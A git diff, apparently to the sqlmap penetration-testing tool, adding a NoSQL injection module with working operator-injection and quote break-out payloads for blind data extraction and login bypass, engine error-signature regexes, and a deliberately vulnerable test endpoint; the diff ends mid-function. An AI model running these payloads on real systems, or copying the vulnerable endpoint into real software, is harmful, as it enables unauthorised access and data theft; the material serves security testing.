diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
index 7a941787127..eecb2bff2a9 100644
--- a/data/txt/sha256sums.txt
+++ b/data/txt/sha256sums.txt
@@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
-63657c00a046ca0fb28fd069407ab6305bd7b95c42f26a96ed083fd05b152252 extra/vulnserver/vulnserver.py
+43214ecb0101bce72eb243c91b90db34693ebfd485d6c111a4ae22591ff7800b extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
-9387fb775b694156a71b336a2a9638ef24c577aa38746f391ac040ff05306d95 lib/controller/checks.py
-96463b969312bd4fd29452b5fc739f33e5a73f81fdc1ef80ac27debbe9926e42 lib/controller/controller.py
+0c6433b289094d37f295238699042a34a6ab950bb3d11f74fe9a83d30bb7f4bd lib/controller/checks.py
+ea0fdf6bcda59aae4d093bada965654a0cd940227c2dbdf62b6ded79baa8dfad lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
-8b260bff7f24947ece55727277d526c88a91f7cb9ffe059c4b9c190bf85f80e1 lib/core/optiondict.py
+056930fba3cf9827f97d280bc38ac785c93108eb84c922f5f39723bb04dcf403 lib/core/optiondict.py
4e7f2ad3d2866093aa195616a0e93de1687406edc0b9038fbfa76bf1c9c174b2 lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
-2db950a79f3f8a4bbb0f35731d4e2eef220150961be55d8ba4b1f9565bdd483a lib/core/settings.py
+ca14e55b4d49a9b9f4e547180828030e4fcc51176dc9036879dbdae05919dd02 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
-c1392cda2f202fa3c628f74533c8d9379d1cf7e754ac165e39021bbc2bbc4a22 lib/core/testing.py
+e453904a50372216b09146ad9f11cdced2323c10f49c3d866238cc044dcb2cce lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
-6060d2d11fab39796b87ace30a872302f365dea3b14d24670915fdb9edc86011 lib/parse/cmdline.py
+223badcfd102cdf3313411b63d09b6c59599d58dfc40d27409b1bfa2efc1aa8f lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@@ -240,6 +240,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
+44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
+d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
@@ -597,6 +599,7 @@ c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_has
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
5372270b7ed82b62f273c2e9bd1f7ecd8605371e66cd0ad70663762cb08d42f1 tests/test_inference_engine.py
caa06fed7323b2bb6d0f2443ce343de94f75bf8ad012c055d5e07741d908ebad tests/test_misc.py
+790b78c600b61eb0bdd6e07e14b1db3eb2ddd5fc5d4edb9e975f85ced38558c7 tests/test_nosql.py
57fa9713a3186020be8bcc3f06399e92bf9ce82ec6d3413c76babe19606bb698 tests/test_openapi_drift.py
cde0bea1263ae857561f91ed2bd515e972b716743f017d31b1718a8546c72759 tests/test_pagecontent.py
4bac34af2abddce003756d6776e89b2fda220bb7603ef3761f4f37ee29f9c369 tests/test_payload_marking.py
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 47ba2cb0b8b..25e4bb3a960 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -122,6 +122,46 @@
LISTEN_ADDRESS = "localhost"
LISTEN_PORT = 8440
+# Minimal MongoDB-style collection backing the NoSQL operator-injection endpoint ('/nosql'). The
+# 'password' field is the blind-extraction target, constrained by a sibling 'name' equality match.
+NOSQL_USERS = {
+ "luther": "s3cr3t",
+ "fluffy": "carrot",
+ "wu": "shanghai",
+}
+
+def nosql_match(params):
+ """Emulates a MongoDB find() on NOSQL_USERS: reconstructs the operator object for the 'password'
+ field (from bracket-notation 'password[$ne]=...' or a JSON sub-document) and evaluates it against
+ the record selected by 'name'. An invalid $regex raises re.error (surfaced as a driver error)."""
+
+ record = NOSQL_USERS.get(params.get("name"))
+
+ spec = params.get("password")
+ if isinstance(spec, dict):
+ op, value = next(iter(spec.items()), ("$eq", None))
+ else:
+ op, value = "$eq", spec
+ for key in params:
+ match = re.match(r"^password\[(\$\w+)\](?:\[\])?$", key)
+ if match:
+ op, value = match.group(1), params[key]
+ break
+
+ if isinstance(value, (tuple, list)):
+ value = value[-1] if value else None
+
+ if record is None:
+ return False
+ elif op == "$ne":
+ return record != value
+ elif op == "$gt":
+ return record > (value or "")
+ elif op == "$regex":
+ return re.search(value, record) is not None
+ else: # $eq, $in (single-valued here) and any literal equality
+ return record == value
+
_conn = None
_cursor = None
_lock = None
@@ -285,6 +325,20 @@ def do_REQUEST(self):
self.wfile.write(form.encode(UNICODE_ENCODING))
return
+ if self.url == "/nosql":
+ self.send_response(OK)
+ self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ try:
+ output = "
Welcome %s" % self.params.get("name") if nosql_match(self.params) else "Invalid credentials"
+ except re.error: # invalid $regex -> emulate a MongoDB driver error (drives fingerprinting)
+ output = "MongoServerError: Regular expression is invalid: missing terminating ] for character class"
+
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index c450aa1d7f3..128b4123d95 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -87,6 +87,7 @@
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import MAX_STABILITY_DELAY
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
+from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
from lib.core.settings import SINGLE_QUOTE_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
@@ -1170,6 +1171,13 @@ def _(page):
except (SystemError, RuntimeError) as ex:
logger.debug("Skipping FI heuristic due to regex failure: %s", getSafeExString(ex))
+ if not conf.nosql and re.search(NOSQL_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (NoSQL) test shows that %sparameter '%s' might be vulnerable to NoSQL injection attacks (rerun with switch '--nosql')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
kb.disableHtmlDecoding = False
kb.heuristicMode = False
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index bd3418d35a5..32857537608 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -520,6 +520,11 @@ def start():
checkWaf()
+ if conf.nosql:
+ from lib.techniques.nosql.inject import nosqlScan
+ nosqlScan()
+ continue
+
if conf.nullConnection:
checkNullConnection()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 1a7d34b0129..ffb03d3fe70 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -118,6 +118,7 @@
"Techniques": {
"technique": "string",
+ "nosql": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 0a2fc08ab84..6ad6cb33d9a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@
from thirdparty import six
# sqlmap version (...)
-VERSION = "1.10.6.159"
+VERSION = "1.10.6.160"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -466,7 +466,8 @@
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?Pquery error: SELECT[^<>]+)",
- r"(?P(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
+ r"(?P(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)",
+ r'"(?:errmsg|errorMessage|reason|msg)"\s*:\s*"(?P[^"]+)"' # generic JSON error-message field (NoSQL document/REST back-ends)
)
# Regular expression used for parsing charset info from meta html headers
@@ -847,6 +848,35 @@
# Regular expression used for recognition of file inclusion errors
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
+# Regular expressions (per back-end, anchored to actual error-message structure - not product names) used for heuristic recognition of NoSQL injection
+NOSQL_ERRORS = (
+ ("MongoDB", r"Mongo(?:Server|Parse|Network|Runtime|Bulk|WriteConcern)?Error\b|\bBSON(?:Type)?Error\b|\bMongooseError\b|CastError: Cast to|unknown (?:top.level )?operator: ?\$|\$(?:regex|where|expr|in|nin|ne|gt|lt|elemMatch) (?:has to be|is not allowed|must be|not supported|requires)|Regular expression is invalid"),
+ ("CouchDB", r'"error"\s*:\s*"(?:bad_request|query_parse_error|missing_named_query)"|invalid operator: ?\$'),
+ ("Elasticsearch", r'"type"\s*:\s*"[a-z_]*?(?:query_shard|x_content_parse|parsing|search_phase_execution|illegal_argument|too_many_clauses|number_format|script)_exception"|Failed to parse query \['),
+ ("Solr", r"org\.apache\.solr\.[\w.]*(?:SyntaxError|SolrException)"),
+ ("Neo4j", r"Neo\.(?:ClientError|DatabaseError|TransientError|ClientNotification)\.|\bNeo4jError\b|even number of non-escaped quotes|Failed to parse string literal|expected an expression|'(?:UNWIND|OPTIONAL|DETACH|FOREACH|MERGE|LOAD CSV)'"),
+ ("ArangoDB", r"\bArangoError\b|AQL: (?:syntax|parse) error"),
+ ("Cassandra", r"line \d+:\d+ (?:no viable alternative at input|(?:mismatched|extraneous) input '.*?' expecting)|org\.apache\.cassandra|com\.datastax|\bInvalid(?:Request|Query)Exception\b"),
+ ("Redis", r"\bWRONGTYPE\b|ERR Error (?:compiling|running) script|@user_script|\bReplyError\b"),
+ ("Memcached", r"CLIENT_ERROR bad|SERVER_ERROR object too large"),
+ ("InfluxDB", r"error parsing query|unable to parse '[^']*': found"),
+ ("HBase/Phoenix", r"org\.apache\.phoenix|PhoenixParserException|org\.apache\.hadoop\.hbase"),
+)
+NOSQL_ERROR_REGEX = "(?:%s)" % '|'.join(regex for _, regex in NOSQL_ERRORS)
+
+# Printable-ASCII codepoint bounds bisected (via regexp character-class ranges) during NoSQL blind extraction
+NOSQL_CHAR_MIN = 0x20
+NOSQL_CHAR_MAX = 0x7e
+
+# Maximum number of document fields enumerated during a NoSQL ($where server-side JavaScript) document dump
+NOSQL_MAX_FIELDS = 64
+
+# Maximum number of records walked during a NoSQL blind multi-record (ordered key paging) collection dump
+NOSQL_MAX_RECORDS = 100
+
+# Upper bound for the length search during NoSQL blind extraction
+NOSQL_MAX_LENGTH = 1024
+
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
diff --git a/lib/core/testing.py b/lib/core/testing.py
index a1773789c4e..0d9a084e7e3 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -88,6 +88,7 @@ def vulnTest():
("-u --flush-session --technique=B --keyset --dump -T users", ("using keyset (seek) pagination", "30 entries", "luther", "nameisnull")), # keyset/seek dump via the SQLite rowid cursor
("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")),
("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
+ ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index d35c61b958f..c6e4205ab38 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -415,6 +415,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
+ techniques.add_argument("--nosql", dest="nosql", action="store_true",
+ help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
+
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
diff --git a/lib/techniques/nosql/__init__.py b/lib/techniques/nosql/__init__.py
new file mode 100644
index 00000000000..2c772879a4f
--- /dev/null
+++ b/lib/techniques/nosql/__init__.py
@@ -0,0 +1,6 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
diff --git a/lib/techniques/nosql/inject.py b/lib/techniques/nosql/inject.py
new file mode 100644
index 00000000000..ed26886dc6d
--- /dev/null
+++ b/lib/techniques/nosql/inject.py
@@ -0,0 +1,765 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import json
+import re
+import time
+
+from collections import namedtuple
+from collections import OrderedDict
+
+from lib.core.common import randomStr
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.enums import POST_HINT
+from lib.core.settings import NOSQL_CHAR_MAX
+from lib.core.settings import NOSQL_CHAR_MIN
+from lib.core.settings import NOSQL_ERROR_REGEX
+from lib.core.settings import NOSQL_MAX_FIELDS
+from lib.core.settings import NOSQL_MAX_LENGTH
+from lib.core.settings import NOSQL_MAX_RECORDS
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.request.connect import Connect as Request
+from lib.utils.xrange import xrange
+from thirdparty.six.moves import urllib as _urllib
+
+# Improbable literal used to build always-true/never-match payloads. Randomized per run (like
+# kb.chars boundaries) so it never becomes a static signature a WAF can pin a blocking rule on.
+NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
+
+# Maximum number of characters of in-band (reflected) data surfaced from an always-true response
+NOSQL_DUMP_LIMIT = 4096
+
+# Delivery shapes that can carry an injection into a back-end filter/query
+NOSQL_PLACES = (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST, PLACE.COOKIE)
+
+# Lucene regexp metacharacters (Elasticsearch/Solr) requiring escaping in built patterns
+LUCENE_META = set('.?+*|(){}[]"\\/')
+
+# Java regexp metacharacters (Cypher/AQL =~) requiring escaping in built patterns
+JAVA_META = set('.?+*|(){}[]^$\\/')
+
+# Engines detectable through a syntax-breaking probe but lacking a clean substring oracle for blind
+# extraction (mapped from recognizable error-message fragments - not product names - to back-end name)
+ERROR_SIGNATURES = (
+ ("Cassandra", ("no viable alternative at input", "org.apache.cassandra", "com.datastax", "invalidrequestexception")),
+ ("Redis", ("wrongtype operation", "err error compiling script", "err error running script", "@user_script", "replyerror")),
+ ("Memcached", ("client_error bad", "server_error object too large")),
+ ("InfluxDB", ("error parsing query", "unable to parse")),
+ ("HBase/Phoenix", ("org.apache.phoenix", "phoenixparserexception", "org.apache.hadoop.hbase")),
+)
+
+_UNSET = object()
+
+# HTTP status of the most recent request issued by _send() (None when bypassed, e.g. under tests)
+_lastCode = None
+
+# Resolved injection vector. `template` is the always-true page for content-based blind extraction
+# (None for time-based/detection-only); `bypass` is the always-true payload reported as a login/filter
+# bypass; `truth` overrides the content oracle (e.g. a timing predicate for the $where time-based path);
+# `dump` is a callable returning (columns, rows) for a whole-document dump (server-side-JS key enumeration).
+Vector = namedtuple("Vector", ("dbms", "fetch", "lengthValue", "charValue", "template", "bypass", "truth", "dump"))
+Vector.__new__.__defaults__ = (None, None, None, None)
+
+def _ratio(first, second):
+ return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
+
+def _encode(value):
+ return _urllib.parse.quote(value, safe="")
+
+def _lucene(value):
+ return "".join(("\\" + _ if _ in LUCENE_META else _) for _ in value)
+
+def _javaEscape(value):
+ return "".join(("\\" + _ if _ in JAVA_META else _) for _ in value)
+
+def _quoted(regex):
+ # double every backslash so a regexp survives a single-quoted string literal (Cypher/AQL/N1QL),
+ # whose own backslash processing would otherwise strip one level before the engine parses it
+ return regex.replace("\\", "\\\\")
+
+def _isJsonBody():
+ return kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE)
+
+def _jsonKey(parameter):
+ for prefix in ("JSON ", "JSON-like "):
+ if parameter.startswith(prefix):
+ return parameter[len(prefix):]
+ return parameter
+
+def _delim(place):
+ # parameter delimiter for the place: ';' for cookies (per --cookie-del), '&' otherwise
+ return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'
+
+def _originalValue(place, parameter):
+ for segment in conf.parameters[place].split(_delim(place)):
+ name, _, value = segment.partition('=')
+ if name.strip() == parameter:
+ return value
+ return conf.paramDict.get(place, {}).get(parameter) or ""
+
+def _replaceSegment(place, parameter, segment):
+ """Rebuild conf.parameters[place], swapping the target parameter for `segment` (e.g. 'k[$ne]=v'
+ or 'k=v') while preserving every sibling parameter verbatim"""
+
+ delimiter = _delim(place)
+ retVal, replaced = [], False
+
+ for part in conf.parameters[place].split(delimiter):
+ if not replaced and part.split('=', 1)[0].strip() == parameter:
+ retVal.append(segment)
+ replaced = True
+ else:
+ retVal.append(part)
+
+ if not replaced:
+ retVal = [segment if name == parameter else "%s=%s" % (_encode(name), _encode(value)) for name, value in conf.paramDict[place].items()]
+
+ return delimiter.join(retVal)
+
+def _send(place, parameter, segment=None, jsonValue=_UNSET):
+ """Issues a single request with the target parameter overridden - by raw 'name=value' segment for
+ URL/body parameters, or by setting the key to `jsonValue` for JSON bodies - returning the response"""
+
+ global _lastCode
+
+ skipUrlEncode = conf.skipUrlEncode
+ conf.skipUrlEncode = True
+
+ try:
+ kwargs = {"raise404": False, "silent": True}
+
+ if jsonValue is not _UNSET and _isJsonBody() and place in (PLACE.POST, PLACE.CUSTOM_POST):
+ try:
+ data = json.loads(conf.data)
+ except Exception:
+ data = {}
+ data[_jsonKey(parameter)] = jsonValue
+ payload = kwargs["post"] = json.dumps(data)
+ elif place == PLACE.COOKIE:
+ payload = kwargs["cookie"] = _replaceSegment(place, parameter, segment)
+ else:
+ payload = _replaceSegment(place, parameter, segment)
+ kwargs["post" if place in (PLACE.POST, PLACE.CUSTOM_POST) else "get"] = payload
+
+ logger.log(CUSTOM_LOGGING.PAYLOAD, _urllib.parse.unquote(payload)) # readable, surfaced at -v 3 like a regular sqlmap payload
+ page, _, _lastCode = Request.getPage(**kwargs)
+ finally:
+ conf.skipUrlEncode = skipUrlEncode
+
+ return page or ""
+
+def _isError(page):
+ # a server-error status or a recognizable back-end error body marks a response as NOT a valid
+ # always-true template (prevents two differing error pages from faking a boolean oracle)
+ return (_lastCode or 0) >= 500 or bool(re.search(NOSQL_ERROR_REGEX, page or ""))
+
+def _fetch(place, parameter, op, value, isArray=False):
+ """MongoDB/CouchDB dialect: renders the parameter as an operator object (bracket or JSON shape)"""
+
+ suffix = ("[%s][]" % op) if isArray else ("[%s]" % op)
+ segment = "%s%s=%s" % (_encode(parameter), suffix, _encode(value))
+ return _send(place, parameter, segment, {op: [value]} if isArray else {op: value})
+
+def _fetchValue(place, parameter, value):
+ """String dialects (Lucene query_string, Cypher, AQL): replaces the parameter's value verbatim"""
+
+ return _send(place, parameter, "%s=%s" % (_encode(parameter), _encode(value)), value)
+
+def _boolean(truthy, falsy):
+ """Returns the (reproducible) true-page when a NoSQL true/false payload pair yields a stable
+ content divergence - i.e. the payload reached and influenced the back-end - else None"""
+
+ truePage = truthy()
+ if not truePage or _isError(truePage): # an error response is never a valid always-true template
+ return None
+
+ falsePage = falsy()
+ if _ratio(truePage, truthy()) > UPPER_RATIO_BOUND and _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
+ return truePage
+
+ return None
+
+def _detectMongo(place, parameter):
+ # $ne (matches everything) vs $in [sentinel] (matches nothing); $gt '' (matches any string) is a
+ # fallback always-true for apps that filter $ne but not the comparison operators
+ return _boolean(lambda: _fetch(place, parameter, "$ne", NOSQL_SENTINEL), lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True)) \
+ or _boolean(lambda: _fetch(place, parameter, "$gt", ""), lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True))
+
+def _detectES(place, parameter):
+ # query_string '*' (matches everything) vs a literal sentinel (matches nothing)
+ return _boolean(lambda: _fetchValue(place, parameter, '*'), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL))
+
+def _detectCypher(place, parameter):
+ # single-quote break-out: OR '1'='1' (true) vs OR '1'='2' (false)
+ return _boolean(lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='1"), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='2"))
+
+def _detectAQL(place, parameter):
+ # single-quote break-out: || '1'=='1 (true) vs || '1'=='2 (false)
+ return _boolean(lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='1"), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='2"))
+
+def _detectNumeric(place, parameter):
+ # unquoted (numeric-context) boolean break-out for SQL-like back-ends: OR/AND (Cypher/N1QL) or
+ # ||/&& (AQL). A numeric field is not blindly regexp-extractable, so exploitation is the in-band
+ # dump of the always-true response (rows reflected by the page)
+ value = (_originalValue(place, parameter) or "1").strip()
+ if not value.isdigit():
+ return None
+
+ template = _boolean(lambda: _fetchValue(place, parameter, "%s OR 1=1" % value), lambda: _fetchValue(place, parameter, "%s AND 1=2" % value))
+ if template:
+ # Cypher, N1QL and PartiQL share OR/AND; tell them apart by a constant-arg, field-free primitive
+ # each engine alone honors: N1QL REGEXP_CONTAINS, DynamoDB begins_with (Cypher has neither)
+ if _confirm(place, parameter, "%s OR REGEXP_CONTAINS('ab', 'a') OR 1=2" % value, "%s OR REGEXP_CONTAINS('ab', 'z') OR 1=2" % value):
+ dbms = "Couchbase"
+ elif _confirm(place, parameter, "%s OR begins_with('ab', 'a') OR 1=2" % value, "%s OR begins_with('ab', 'z') OR 1=2" % value):
+ dbms = "DynamoDB"
+ else:
+ dbms = "Neo4j"
+ return dbms, template, "%s OR 1=1" % value
+
+ template = _boolean(lambda: _fetchValue(place, parameter, "%s || 1==1" % value), lambda: _fetchValue(place, parameter, "%s && 1==2" % value))
+ if template:
+ return "ArangoDB", template, "%s || 1==1" % value
+
+ return None
+
+def _detectError(place, parameter):
+ # last-resort: a syntax-breaking value that diverges from a normal one and surfaces an engine error
+ original = _originalValue(place, parameter) or '1'
+ normal = _fetchValue(place, parameter, original)
+ broken = _fetchValue(place, parameter, original + "'")
+
+ if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND:
+ return None
+
+ for engine, tokens in ERROR_SIGNATURES:
+ if any(_ in broken.lower() for _ in tokens):
+ return engine
+
+ return None
+
+def _fingerprintMongo(place, parameter):
+ page = _fetch(place, parameter, "$regex", '(').lower() # invalid regexp -> driver/DB error
+ if any(_ in page for _ in ("couch", "mango", "bad_arg", "erlang")):
+ return "CouchDB"
+ elif any(_ in page for _ in ("mongo", "bson", "regular expression", "$regex")):
+ return "MongoDB"
+ else:
+ return "MongoDB (assumed)"
+
+def _fingerprintLucene(place, parameter):
+ page = _fetchValue(place, parameter, "/[/").lower() # invalid regexp -> engine error
+ if any(_ in page for _ in ("solr", "solrexception")):
+ return "Solr"
+ elif "opensearch" in page:
+ return "OpenSearch"
+ else:
+ return "Elasticsearch"
+
+def _constraint(place, parameter, eq='=', conj=" AND ", prefix="u."):
+ """Re-expresses sibling parameters as query constraints (field == parameter name) so extraction
+ stays bound to the originally matched record. `prefix`/`eq`/`conj` adapt the per-dialect syntax
+ (Cypher: 'u.'/'='/' AND '; AQL: 'u.'/'=='/' && '; $where JS: 'this.'/'=='/'&&')"""
+
+ parts = []
+
+ for segment in conf.parameters[place].split(_delim(place)):
+ if '=' not in segment:
+ continue
+ name, _, value = segment.partition('=')
+ name = name.strip()
+ if name and name != parameter:
+ parts.append("%s%s%s'%s'" % (prefix, name, eq, value))
+
+ return (conj.join(parts) + conj) if parts else ""
+
+def _confirm(place, parameter, truePayload, falsePayload):
+ # disambiguates dialects that share the same break-out syntax by probing a dialect-specific
+ # regexp-match primitive (e.g. Cypher '=~' vs N1QL 'REGEXP_CONTAINS') for a true/false divergence
